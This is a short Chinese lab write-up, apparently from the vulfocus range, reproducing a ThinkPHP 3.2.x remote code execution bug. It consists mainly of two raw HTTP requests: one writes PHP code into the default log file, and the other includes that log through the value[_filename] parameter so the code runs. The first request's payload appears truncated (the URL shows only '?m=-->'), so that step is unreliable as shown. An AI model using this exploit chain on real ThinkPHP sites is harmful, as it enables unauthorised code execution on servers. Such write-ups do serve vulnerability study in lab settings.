vulfocus——thinkphp3.2.x代码执行

描述

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中，业务代码中如果模板赋值方法assign的第一个参数可控，则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径，造成任意文件包含，执行任意代码。 

复现

1.在默认的日志路径中包含执行PHP代码，数据包如下：

GET /index.php?m=--> HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1

 

2./index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log

22_10_01是复现的日期，根据自己的时间做调整

GET /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1